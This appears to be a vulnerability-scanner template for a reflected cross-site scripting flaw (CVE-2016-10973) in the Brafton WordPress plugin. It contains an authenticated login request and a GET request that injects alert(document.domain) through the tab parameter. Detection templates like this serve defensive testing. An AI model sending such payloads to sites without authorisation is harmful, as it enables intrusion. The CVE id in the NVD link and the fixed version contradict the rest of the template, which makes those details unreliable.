id: CVE-2016-10973 info: name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting author: Harsh severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 epss-percentile: 0.54918 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: brafton product: brafton framework: wordpress tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(content_type_2, "text/html")' - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and # digest: 490a00463044022061c0dedebb0512341b3aa74f82656c055dc78496472d976d9cbe26996534128402202417e6a5bd9a8f099c833261e718bebf7332cc556d4b4d9ea309a7b27c5966ff:922c64590222798bb761d5b6d8e72950